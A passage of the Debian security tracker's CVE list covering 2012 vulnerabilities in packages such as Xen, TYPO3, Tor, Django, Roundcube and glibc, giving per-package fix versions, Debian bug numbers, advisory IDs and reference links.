NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3591 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3590 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3589 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3588 (Directory traversal vulnerability in preview.php in the Plugin ...) NOT-FOR-US: Wordpress plugin CVE-2012-3587 (APT 0.7.x before 0.7.25 and 0.8.x before 0.8.16, when using the ...) - apt (unimportant) NOTE: net-update is disabled by default on Debian CVE-2012-3586 RESERVED CVE-2012-3585 (Heap-based buffer overflow in jpeg_ls.dll in the Jpeg_LS (aka JLS) ...) NOT-FOR-US: IrfanView PlugIns CVE-2012-3584 RESERVED CVE-2012-3583 RESERVED CVE-2012-3582 (Symantec PGP Universal Server 3.2.x before 3.2.1 MP2 does not properly ...) NOT-FOR-US: Symantec PGP Universal Server CVE-2012-3581 (Symantec Messaging Gateway (SMG) before 10.0 allows remote attackers ...) NOT-FOR-US: Symantec Messaging Gateway CVE-2012-3580 (Symantec Messaging Gateway (SMG) before 10.0 allows remote ...) NOT-FOR-US: Symantec Messaging Gateway CVE-2012-3579 (Symantec Messaging Gateway (SMG) before 10.0 has a default password ...) NOT-FOR-US: Symantec Messaging Gateway CVE-2012-3578 (Unrestricted file upload vulnerability in html/Upload.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2012-3577 (Unrestricted file upload vulnerability in doupload.php in the Nmedia ...) NOT-FOR-US: Wordpress plugin CVE-2012-3576 (Unrestricted file upload vulnerability in php/upload.php in the ...) 
NOT-FOR-US: Wordpress plugin CVE-2012-3575 (Unrestricted file upload vulnerability in uploader.php in the RBX ...) NOT-FOR-US: Wordpress plugin CVE-2012-3574 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Wordpress plugin CVE-2012-3573 RESERVED CVE-2012-3572 (Open Source Competency Center (OSCC) MyMeeting 3.0.1 and earlier, and ...) NOT-FOR-US: Open Source Competency Center (OSCC) MyMeeting CVE-2011-5094 (** DISPUTED ** Mozilla Network Security Services (NSS) 3.x, with ...) NOTE: Disputed NSS issue CVE-2012-3571 (ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows ...) {DSA-2519-2 DSA-2519-1 DSA-2516-1} - isc-dhcp 4.2.4-2 (bug #686174) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1 CVE-2012-3570 (Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is ...) - isc-dhcp 4.2.4-2 (bug #686174) [squeeze] - isc-dhcp (Vulnerable code not present) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1 CVE-2012-3569 (Format string vulnerability in VMware OVF Tool 2.1 on Windows, as used ...) NOT-FOR-US: VMware OVF Tool CVE-2012-3568 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3567 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3566 (Opera before 12.00 Beta allows user-assisted remote attackers to cause ...) NOT-FOR-US: Opera CVE-2012-3565 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3564 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3563 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3562 (Opera before 12.00 Beta allows user-assisted remote attackers to cause ...) NOT-FOR-US: Opera CVE-2012-3561 (Opera before 11.64 does not properly allocate memory for URL strings, ...) 
NOT-FOR-US: Opera CVE-2012-3560 (Opera before 11.65 does not ensure that the address field corresponds ...) NOT-FOR-US: Opera CVE-2012-3559 (Unspecified vulnerability in Opera before 12.00 on Mac OS X has ...) NOT-FOR-US: Opera CVE-2012-3558 (Opera before 11.65 does not ensure that the address field corresponds ...) NOT-FOR-US: Opera CVE-2012-3557 (Opera before 11.65 does not properly restrict the reading of JSON ...) NOT-FOR-US: Opera CVE-2012-3556 (Opera before 11.65 does not properly restrict the opening of a pop-up ...) NOT-FOR-US: Opera CVE-2012-3555 (Opera before 11.65 does not ensure that keyboard sequences are ...) NOT-FOR-US: Opera CVE-2012-3554 (SQL injection vulnerability in the RSGallery2 (com_rsgallery2) ...) NOT-FOR-US: Joomla addon CVE-2012-3552 (Race condition in the IP implementation in the Linux kernel before 3.0 ...) {DSA-2668-1} - linux 3.0-1 - linux-2.6 CVE-2012-3551 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Crowbar CVE-2012-3550 RESERVED CVE-2012-3549 (The SCTP implementation in FreeBSD 8.2 allows remote attackers to ...) - kfreebsd-8 8.3-5 (bug #686961) - kfreebsd-9 9.0-7 (bug #686962) - kfreebsd-10 10.0~svn242489-1 (bug #686963) NOTE: http://www.exploit-db.com/exploits/20226/ CVE-2012-3548 (The dissect_drda function in epan/dissectors/packet-drda.c in ...) - wireshark 1.8.2-2 (unimportant; bug #686225) [squeeze] - wireshark (Vulnerable code not present) NOTE: Doesn't allow code injection NOTE: debian changelog contains CVE-2012-5239, but this was rejected in favour of CVE-2012-3548 CVE-2012-3547 (Stack-based buffer overflow in the cbtls_verify function in FreeRADIUS ...) {DSA-2546-1} - freeradius 2.1.12+dfsg-1.1 (medium; bug #687175) CVE-2012-3546 (org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before ...) 
- tomcat7 7.0.28-4 (bug #695251) - tomcat6 6.0.35-6 (bug #695250) CVE-2012-3545 RESERVED CVE-2012-3544 [Chunked transfer encoding extension size is not limited] RESERVED - tomcat6 - tomcat7 7.0.30 CVE-2012-3543 RESERVED - mono 2.10.8.1-7 (bug #686562) CVE-2012-3542 (OpenStack Keystone, as used in OpenStack Folsom before folsom-rc1 and ...) - keystone 2012.1.1-5 CVE-2012-3541 RESERVED CVE-2012-3540 (Open redirect vulnerability in views/auth_forms.py in OpenStack ...) - horizon 2012.1.1-4 (bug #686050) CVE-2012-3539 REJECTED CVE-2012-3538 (Pulp in Red Hat CloudForms before 1.1 logs administrative passwords in ...) NOT-FOR-US: Red Hat CloudForms CVE-2012-3537 (The Crowbar Ohai plugin ...) NOT-FOR-US: crowbar ohai plugin NOTE: https://github.com/SUSE-Cloud/barclamp-deployer/commit/b6454268a067fc77ff5de82057b5b53b3cc38b87 CVE-2012-3536 RESERVED CVE-2012-3535 (Heap-based buffer overflow in OpenJPEG 1.5.0 and earlier allows remote ...) {DSA-2629-1} - openjpeg 1.3+dfsg-4.6 (bug #685970) CVE-2012-3534 (GNU Gatekeeper before 3.1 does not limit the number of connections to ...) - gnugk 2:3.0.2-3 (bug #685969) CVE-2012-3533 (The python SDK before 3.1.0.6 and CLI before 3.1.0.8 for oVirt 3.1 ...) NOT-FOR-US: ovirt CVE-2012-3532 (Cross-site request forgery (CSRF) vulnerability in the GateIn Portal ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-3531 (Cross-site scripting (XSS) vulnerability in the Install Tool in TYPO3 ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3530 (Incomplete blacklist vulnerability in the t3lib_div::quoteJSvalue API ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3529 (The configuration module in the backend in TYPO3 4.5.x before 4.5.19, ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3528 (Multiple cross-site scripting (XSS) vulnerabilities in the backend in ...) 
{DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3527 (view_help.php in the backend help system in TYPO3 4.5.x before 4.5.19, ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3526 (The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the ...) {DSA-2532-1} - libapache2-mod-rpaf 0.6-1 (bug #683984) CVE-2012-3525 (s2s/out.c in jabberd2 2.2.16 and earlier does not verify that a ...) - jabberd2 (bug #685666) CVE-2012-3524 (libdbus 1.5.x and earlier, when used in setuid or other privileged ...) - dbus 1.6.8-1 (bug #689070) [squeeze] - dbus 1.2.24-4+squeeze2 - glib2.0 2.33.12+really2.32.4-2 [squeeze] - glib2.0 (Vulnerable code not present) NOTE: fixed in 2.34.0-1 from experimental NOTE: http://www.openwall.com/lists/oss-security/2012/09/12/6 NOTE: https://bugzilla.novell.com/show_bug.cgi?id=697105 NOTE: http://stealth.openwall.net/null/dzug.c CVE-2012-3523 (The STARTTLS implementation in nnrpd in INN before 2.5.3 does not ...) - inn (STARTTLS was introduced in 2.3, see bug #685581) - inn2 2.5.3-1 (low; bug #685581) [squeeze] - inn2 (Minor issue) CVE-2012-3522 [geshi XSS in contrib/langwiz.php] RESERVED - geshi (Vulnerable code not present, see bug #685323) [squeeze] - geshi (shipped as example/.gz) CVE-2012-3521 [geshi information disclosure in contrib/cssgen.php] RESERVED - geshi 1.0.8.4-2 (bug #685324) [squeeze] - geshi 1.0.8.4-1+squeeze1 CVE-2012-3520 (The Netlink implementation in the Linux kernel before 3.2.30 does not ...) - linux 3.2.29-1 - linux-2.6 (Introduced in 3.1) CVE-2012-3519 (routerlist.c in Tor before 0.2.2.38 uses a different amount of time ...) {DSA-2548-1} - tor 0.2.3.20-rc-1 (low) CVE-2012-3518 (The networkstatus_parse_vote_from_string function in routerparse.c in ...) {DSA-2548-1} - tor 0.2.3.20-rc-1 (low) CVE-2012-3517 (Use-after-free vulnerability in dns.c in Tor before 0.2.2.38 might ...) 
- tor 0.2.3.20-rc-1 (low) [squeeze] - tor (Minor issue) CVE-2012-3516 (The GNTTABOP_swap_grant_ref sub-operation in the grant table hypercall ...) - xen (Only affects >= 4.2) CVE-2012-3515 (Qemu, as used in Xen 4.0, 4.1 and possibly other products, when ...) {DSA-2545-1 DSA-2543-1 DSA-2542-1} - xen 4.1.3-2 (bug #686764) [squeeze] - xen (Vulnerable code not present) - xen-qemu-dm-4.0 - qemu 1.1.2+dfsg-1 - qemu-kvm 1.1.2+dfsg-1 CVE-2012-3514 (OCaml Xml-Light Library before r234 computes hash values without ...) - xml-light 2.2-15 (low; bug #685584) [squeeze] - xml-light (Minor issue) CVE-2012-3513 (munin-cgi-graph in Munin before 2.0.6, when running as a CGI module ...) - munin 2.0.6-1 (bug #684076) [squeeze] - munin (vulnerable code introduced in 2.x) NOTE: http://www.munin-monitoring.org/ticket/1238 CVE-2012-3512 (Munin before 2.0.6 stores plugin state files that run as root in the ...) - munin 2.0.6-1 (bug #684075) NOTE: http://www.munin-monitoring.org/ticket/1234 CVE-2012-3511 (Multiple race conditions in the madvise_remove function in ...) - linux 3.2.23-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2012-3510 (Use-after-free vulnerability in the xacct_add_tsk function in ...) - linux 2.6.20-1 - linux-2.6 2.6.20-1 CVE-2012-3509 (Multiple integer overflows in the (1) _objalloc_alloc function in ...) - binutils 2.22-8 (low; bug #688951) [squeeze] - binutils (Minor issue) CVE-2012-4668 (Cross-site scripting (XSS) vulnerability in Roundcube Webmail 0.8.1 ...) - roundcube 0.7.2-4 (bug #685475) [squeeze] - roundcube (Vulnerable code not present) NOTE: http://trac.roundcube.net/ticket/1488613 CVE-2012-3508 (Cross-site scripting (XSS) vulnerability in program/lib/washtml.php in ...) - roundcube 0.7.2-4 (bug #685475) [squeeze] - roundcube (Vulnerable code not present) NOTE: http://trac.roundcube.net/ticket/1488613 CVE-2012-3507 (Cross-site scripting (XSS) vulnerability in ...) 
- roundcube (only affects rc versions of 0.8) NOTE: http://trac.roundcube.net/ticket/1488519 CVE-2012-3506 (Unspecified vulnerability in the Apache Open For Business Project (aka ...) NOT-FOR-US: OFBiz CVE-2012-3505 (Tinyproxy 1.8.3 and earlier allows remote attackers to cause a denial ...) {DSA-2564-1} - tinyproxy 1.8.3-3 (bug #685281) NOTE: https://bugs.launchpad.net/ubuntu/+source/tinyproxy/+bug/1036985 CVE-2012-3504 (The nssconfigFound function in genkey.pl in crypto-utils 2.4.1-34 ...) NOT-FOR-US: genkey script from Red Hat, not present in Debian CVE-2012-3503 (The installation script in Katello 1.0 and earlier does not properly ...) NOT-FOR-US: Katello CVE-2012-3502 (The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp ...) - apache2 (Only affects 2.4 from experimental) NOTE: https://issues.apache.org/bugzilla/show_bug.cgi?id=53727 CVE-2012-3501 (The squidclamav_check_preview_handler function in squidclamav.c in ...) - squidclamav (bug #685398) CVE-2012-3500 (scripts/annotate-output.sh in devscripts before 2.12.2, as used in ...) {DSA-2549-1} - devscripts 2.12.2 CVE-2012-3499 (Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP ...) {DSA-2637-1} - apache2 2.2.22-13 (low) CVE-2012-3498 (PHYSDEVOP_map_pirq in Xen 4.1 and 4.2 and Citrix XenServer 6.0.2 and ...) - xen 4.1.3-2 (bug #686764) [squeeze] - xen (Vulnerable code not present) CVE-2012-3497 ((1) TMEMC_SAVE_GET_CLIENT_WEIGHT, (2) TMEMC_SAVE_GET_CLIENT_CAP, (3) ...) - xen 4.1.4-1 (unimportant; bug #686764) [squeeze] - xen (Experimental/unsupported feature) NOTE: TMEM not supported for production systems (technology preview) CVE-2012-3496 (XENMEM_populate_physmap in Xen 4.0, 4.1, and 4.2, and Citrix XenServer ...) {DSA-2544-1} - xen 4.1.3-2 (bug #686764) CVE-2012-3495 (The physdev_get_free_pirq hypercall in arch/x86/physdev.c in Xen 4.1.x ...) 
- xen 4.1.3-2 (bug #686764) [squeeze] - xen (Vulnerable code not present) CVE-2012-3494 (The set_debugreg hypercall in include/asm-x86/debugreg.h in Xen 4.0, ...) {DSA-2544-1} - xen 4.1.3-2 (bug #686764) CVE-2012-3493 (The command_give_request_ad function in condor_startd.V6/command.cpp ...) - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3492 (The filesystem authentication (condor_io/condor_auth_fs.cpp) in Condor ...) - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3491 (src/condor_schedd.V6/schedd.cpp in Condor 7.6.x before 7.6.10 and ...) - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3490 RESERVED - condor 7.8.2~dfsg.1-1+deb7u1 (bug #688210) CVE-2012-3489 (The xml_parse function in the libxml2 support in the core server ...) {DSA-2534-1} - postgresql-9.1 9.1.5-1 - postgresql-8.4 8.4.12-2 CVE-2012-3488 (The libxslt support in contrib/xml2 in PostgreSQL 8.3 before 8.3.20, ...) {DSA-2534-1} - postgresql-9.1 9.1.5-1 - postgresql-8.4 8.4.12-2 CVE-2012-3487 (Race condition in Tunnelblick 3.3beta20 and earlier allows local users ...) NOT-FOR-US: Tunnelblick CVE-2012-3486 (Tunnelblick 3.3beta20 and earlier allows local users to gain ...) NOT-FOR-US: Tunnelblick CVE-2012-3485 (Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the ...) NOT-FOR-US: Tunnelblick CVE-2012-3484 (Tunnelblick 3.3beta20 and earlier relies on a test for specific ...) NOT-FOR-US: Tunnelblick CVE-2012-3483 (Race condition in the runScript function in Tunnelblick 3.3beta20 and ...) NOT-FOR-US: Tunnelblick CVE-2012-3482 (Fetchmail 5.0.8 through 6.3.21, when using NTLM authentication in ...) - fetchmail 6.3.22-1 (low) [wheezy] - fetchmail (Minor issue) [squeeze] - fetchmail (Minor issue) CVE-2012-3481 (Integer overflow in the ReadImage function in ...) 
- gimp 2.8.2-1 (bug #685397) NOTE: http://www.openwall.com/lists/oss-security/2012/08/20/8 NOTE: https://bugzilla.novell.com/show_bug.cgi?id=776572 CVE-2012-3480 (Multiple integer overflows in the (1) strtod, (2) strtof, (3) strtold, ...) - eglibc 2.13-36 (bug #684889) - glibc CVE-2012-3479 (lisp/files.el in Emacs 23.2, 23.3, 23.4, and 24.1 automatically ...) {DSA-2603-1} - emacs23 23.4+1-4 (bug #684695) - emacs24 24.2+1-1 (bug #684694) NOTE: http://www.openwall.com/lists/oss-security/2012/08/13/1 NOTE: http://www.openwall.com/lists/oss-security/2012/08/13/2 CVE-2012-3478 (rssh 2.3.3 and earlier allows local users to bypass intended ...) {DSA-2530-1} - rssh 2.3.3-5 CVE-2012-3477 (SQL injection vulnerability in signup_check.php in NeoInvoice allows ...) NOT-FOR-US: Neoinvoice CVE-2012-3476 (Multiple cross-site scripting (XSS) vulnerabilities in (1) ...) NOT-FOR-US: Ushahidi CVE-2012-3475 (The installer in the Ushahidi Platform before 2.5 omits certain calls ...) NOT-FOR-US: Ushahidi CVE-2012-3474 (The comments API in ...) NOT-FOR-US: Ushahidi CVE-2012-3473 (The (1) reports API and (2) administration feature in the comments API ...) NOT-FOR-US: Ushahidi CVE-2012-3472 (The email API in application/libraries/api/MY_Email_Api_Object.php in ...) NOT-FOR-US: Ushahidi CVE-2012-3471 (Multiple SQL injection vulnerabilities in the edit functions in (1) ...) NOT-FOR-US: Ushahidi CVE-2012-3470 (Multiple SQL injection vulnerabilities in ...) NOT-FOR-US: Ushahidi CVE-2012-3469 (Multiple SQL injection vulnerabilities in the Ushahidi Platform before ...) NOT-FOR-US: Ushahidi CVE-2012-3468 (Multiple SQL injection vulnerabilities in the Ushahidi Platform before ...) NOT-FOR-US: Ushahidi CVE-2012-3467 (Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism ...) - qpid-cpp 0.16-7 (bug #684456) [wheezy] - qpid-cpp 0.16-6+deb7u1 CVE-2012-3466 (GNOME gnome-keyring 3.4.0 through 3.4.1, when gpg-cache-method is set ...) 
- gnome-keyring 3.4.1-5 (bug #683655) [squeeze] - gnome-keyring (Only affects gnome-keyring 3.4.x) CVE-2012-3465 (Cross-site scripting (XSS) vulnerability in ...) {DSA-2655-1} - rails 2.3.14.1 (low) - ruby-actionpack-3.2 3.2.6-4 (bug #684454) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2012-3464 (Cross-site scripting (XSS) vulnerability in ...) {DSA-2655-1} - rails 2.3.14.1 (low) - ruby-actionpack-3.2 3.2.6-4 (bug #684454) NOTE: Starting with 2.3.14.1 rails is a transition package CVE-2012-3463 (Cross-site scripting (XSS) vulnerability in ...) - rails (Only affects RoR 3.x) - ruby-actionpack-3.2 3.2.6-4 (bug #684454) NOTE: http://www.openwall.com/lists/oss-security/2012/08/09/8 CVE-2012-3462 RESERVED CVE-2012-3461 (The (1) otrl_base64_otr_decode function in src/b64.c; (2) ...) {DSA-2526-1} - libotr 3.2.1-1 (medium; bug #684121) CVE-2012-3460 RESERVED CVE-2012-3459 (Cumin before 0.1.5444, as used in Red Hat Enterprise Messaging, ...) NOT-FOR-US: Cumin CVE-2012-3458 (Beaker before 1.6.4, when using PyCrypto to encrypt sessions, uses AES ...) {DSA-2541-1} - beaker 1.6.3-1.1 (bug #684890) CVE-2012-3457 (PNP4Nagios 0.6 through 0.6.16 uses world-readable permissions for ...) - pnp4nagios (unimportant; bug #683879) NOTE: The permissions of this file are under the control of the admin CVE-2012-3456 (Heap-based buffer overflow in the read function in ...) - calligra 1:2.4.3-2 (bug #684004) - wv2 0.4.2.dfsg.1-9.1 (low) [squeeze] - wv2 (Minor issue) CVE-2012-3455 (Heap-based buffer overflow in the read function in ...) - koffice CVE-2012-3454 (eXtplorer 2.1.0b6 uses world writable permissions for the ...) - extplorer 2.1.0b6+dfsg.3-4 (low; bug #683649) [squeeze] - extplorer (Minor issue) CVE-2012-3453 (logol 1.5.0 uses world writable permissions for the ...) - logol 1.5.0-4 (bug #683647) CVE-2012-3452 (gnome-screensaver 3.4.x before 3.4.4 and 3.5.x before 3.5.4, when ...) 
- gnome-screensaver (vulnerable code not present) CVE-2012-3451 (Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 ...) NOT-FOR-US: Apache CXF CVE-2012-3450 (pdo_sql_parser.re in the PDO extension in PHP before 5.3.14 and 5.4.x ...) {DSA-2527-1} - php5 5.4.4-1 (bug #683694) NOTE: http://seclists.org/bugtraq/2012/Jun/60 NOTE: https://bugs.php.net/bug.php?id=61755 NOTE: http://www.openwall.com/lists/oss-security/2012/08/02/3 NOTE: http://www.openwall.com/lists/oss-security/2012/08/02/7 CVE-2012-3449 (Open vSwitch 1.4.2 uses world writable permissions for (1) ...) - openvswitch 1.4.2+git20120612-8 (bug #683665) CVE-2012-3448 (Unspecified vulnerability in Ganglia Web before 3.5.1 allows remote ...) {DSA-2610-1} - ganglia 3.3.8-1 (bug #683584) CVE-2012-3447 (virt/disk/api.py in OpenStack Compute (Nova) 2012.1.x before 2012.1.2 ...) - nova 2012.1.1-6 (bug #684256) CVE-2012-3446 (Apache Libcloud before 0.11.1 uses an incorrect regular expression ...) - libcloud 0.5.0-1.1 (bug #683927) CVE-2012-3445 (The virTypedParameterArrayClear function in libvirt 0.9.13 does not ...) - libvirt 0.9.12-4 (bug #683483) [squeeze] - libvirt (Vulnerable code not present) NOTE: https://www.redhat.com/archives/libvir-list/2012-July/msg01650.html NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=844734 CVE-2012-3444 (The get_image_dimensions function in the image-handling functionality ...) {DSA-2529-1} - python-django 1.4.1-1 (bug #683364) NOTE: https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/ NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/2 CVE-2012-3443 (The django.forms.ImageField class in the form system in Django before ...) 
	{DSA-2529-1}
	- python-django 1.4.1-1 (bug #683364)
	NOTE: https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/2
CVE-2012-3442 (The (1) django.http.HttpResponseRedirect and (2) ...)
	{DSA-2529-1}
	- python-django 1.4.1-1 (bug #683364)
	NOTE: https://www.djangoproject.com/weblog/2012/jul/30/security-releases-issued/
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/31/2
CVE-2012-3441 (The database creation script ...)
	- icinga (Debian uses dbconfig, which does the right thing, bug #683320)
CVE-2012-3440 (A certain Red Hat script for sudo 1.7.2 on Red Hat Enterprise Linux ...)
	- sudo (Red Hat-specific postinst script)
CVE-2012-3439
	REJECTED
CVE-2012-3438 (The Magick_png_malloc function in coders/png.c in GraphicsMagick ...)
	- graphicsmagick 1.3.16-1.1 (low; bug #683284)
	[squeeze] - graphicsmagick (Minor issue)
CVE-2012-3437 (The Magick_png_malloc function in coders/png.c in ImageMagick 6.7.8-6 ...)
	- imagemagick 8:6.7.7.10-3 (low; bug #683285)
	[squeeze] - imagemagick (Minor issue)
CVE-2012-3436 (OpenTTD 0.6.0 through 1.2.1 does not properly validate requests to ...)
	{DSA-2524-1}
	- openttd 1.2.1-2 (low; bug #683258)
CVE-2012-3435 (SQL injection vulnerability in frontends/php/popup_bitem.php in Zabbix ...)
	{DSA-2539-1}
	- zabbix 1:2.0.2+dfsg-1 (bug #683273)
	NOTE: http://seclists.org/oss-sec/2012/q3/127
CVE-2012-3434 (Multiple cross-site scripting (XSS) vulnerabilities in userperspan.php ...)
	NOT-FOR-US: WordPress plugin Count Per Day
CVE-2012-3433 (Xen 4.0 and 4.1 allows local HVM guest OS kernels to cause a denial of ...)
	{DSA-2531-1}
	- xen 4.1.3-1 (bug #683279)
CVE-2012-3432 (The handle_mmio function in arch/x86/hvm/io.c in the MMIO operations ...)
	{DSA-2531-1}
	- xen 4.1.3-1 (bug #683279)
CVE-2012-3431 (The Teiid Java Database Connectivity (JDBC) socket, as used in JBoss ...)
	NOT-FOR-US: Teiid
CVE-2012-3430 (The rds_recvmsg function in net/rds/recv.c in the Linux kernel before ...)
	- linux 3.2.29-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-36
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/26/3
CVE-2012-3429 (The dns_to_ldap_dn_escape function in src/ldap_convert.c in ...)
	NOT-FOR-US: Dynamic LDAP backend plugin for BIND
CVE-2012-3428 (The IronJacamar container before 1.0.12.Final for JBoss Application ...)
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-3427
	RESERVED
	- jbossas4 (Only builds a few libraries, not the full application server)
CVE-2012-3426 (OpenStack Keystone before 2012.1.1, as used in OpenStack Folsom before ...)
	- keystone 2012.1.1-1
CVE-2012-3425 (The png_push_read_zTXt function in pngpread.c in libpng 1.0.x before ...)
	- libpng 1.2.49-1 (low; bug #668082)
	[squeeze] - libpng (Minor issue)
CVE-2012-3424 (The decode_credentials method in ...)
	- rails (Only affects RoR 3.x)
	- ruby-actionpack-3.2 3.2.6-3 (bug #683370)
CVE-2012-3423 (The IcedTea-Web plugin before 1.2.1 does not properly handle NPVariant ...)
	- icedtea-web 1.3-1
CVE-2012-3422 (The getFirstInTableInstance function in the IcedTea-Web plugin before ...)
	- icedtea-web 1.3-1
CVE-2012-3421 (The pduread function in pdu.c in libpcp in Performance Co-Pilot (PCP) ...)
	{DSA-2533-1}
	- pcp 3.6.5 (bug #685476)
CVE-2012-3420 (Multiple memory leaks in Performance Co-Pilot (PCP) before 3.6.5 allow ...)
	{DSA-2533-1}
	- pcp 3.6.5 (bug #685476)
CVE-2012-3419 (Performance Co-Pilot (PCP) before 3.6.5 exports some of the /proc file ...)
	{DSA-2533-1}
	- pcp 3.6.5 (bug #685476)
CVE-2012-3418 (libpcp in Performance Co-Pilot (PCP) before 3.6.5 allows remote ...)
	{DSA-2533-1}
	- pcp 3.6.5 (bug #685476)
CVE-2012-3417 (The good_client function in rquotad (rquota_svc.c) in Linux DiskQuota ...)
	- quota 4.00~pre1-1
	NOTE: this is at least fixed in 4.00, I could not trace this back to an exact version
CVE-2012-3416 (Condor before 7.8.2 allows remote attackers to bypass host-based ...)
	- condor 7.8.2~dfsg.1-1 (bug #685366)
CVE-2012-3415
	RESERVED
	- plupload (bug #668396)
	- wordpress 3.3.2
CVE-2012-3414 [libjs-swfupload, wordpress: XSS vulnerability]
	RESERVED
	- libjs-swfupload 2.2.0.1+ds1-2 (low; bug #681323)
	- wordpress 3.5.1+dfsg-1 (bug #698934)
	NOTE: https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/
CVE-2012-3413 (The HTMLQuoteColorer::process function in ...)
	- kdepim (Only affects kdepim >= 4.6)
	NOTE: CVE-request http://www.openwall.com/lists/oss-security/2012/07/13/3
	NOTE: https://projects.kde.org/projects/kde/kdepim/repository/revisions/dbb2f72f4745e00f53031965a9c10b2d6862bd54
	NOTE: https://bugs.launchpad.net/ubuntu/+source/kdepim/+bug/1022690
CVE-2012-3412 (The sfc (aka Solarflare Solarstorm) driver in the Linux kernel before ...)
	- linux 3.2.29-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-36
CVE-2012-3411 (Dnsmasq before 2.63test1, when used with certain libvirt ...)
	- dnsmasq 2.63-1 (low; bug #683372)
	[wheezy] - dnsmasq (Minor issue)
	[squeeze] - dnsmasq (Minor issue)
	NOTE: Please see CVE-2013-0198
CVE-2012-3410 (Stack-based buffer overflow in lib/sh/eaccess.c in GNU Bash before 4.2 ...)
	- bash 4.2-4 (low; bug #681278)
	[squeeze] - bash (Minor issue)
CVE-2012-3409
	RESERVED
	- ecryptfs-utils 99-1 (bug #682220)
	[squeeze] - ecryptfs-utils (home src/dest mountpoints hardcoded in that version)
CVE-2012-3408 (lib/puppet/network/authstore.rb in Puppet before 2.7.18, and Puppet ...)
	- puppet 2.7.18-1 (low)
	[squeeze] - puppet (Minor issue)
	NOTE: http://puppetlabs.com/security/cve/cve-2012-3408/
	NOTE: There's no code fix, but this should be addressed in stable with a NEWS file warning about this
	NOTE: Fixed in 2.7.18 by updated docs
CVE-2012-3407
	RESERVED
	NOT-FOR-US: plow
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/6
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/16
CVE-2012-3406 [glibc formatted printing vulnerabilities]
	RESERVED
	- eglibc (low; bug #681888)
	[squeeze] - eglibc (Minor issue)
	[wheezy] - eglibc (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=826943
	NOTE: https://bugzilla.redhat.com/attachment.cgi?id=594722&action=diff
	NOTE: https://bugzilla.redhat.com/attachment.cgi?id=594727&action=diff
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/5
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/17
CVE-2012-3405 [glibc formatted printing vulnerabilities]
	RESERVED
	- eglibc 2.13-35 (low; bug #681473)
	NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=13446
	NOTE: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a4647e727a2a52e1259474c13f4b13288938bed4
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=833704
	NOTE: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=1d498daa95384e5c9ad5bcb35e7a996e5869ac39
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/5
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/17
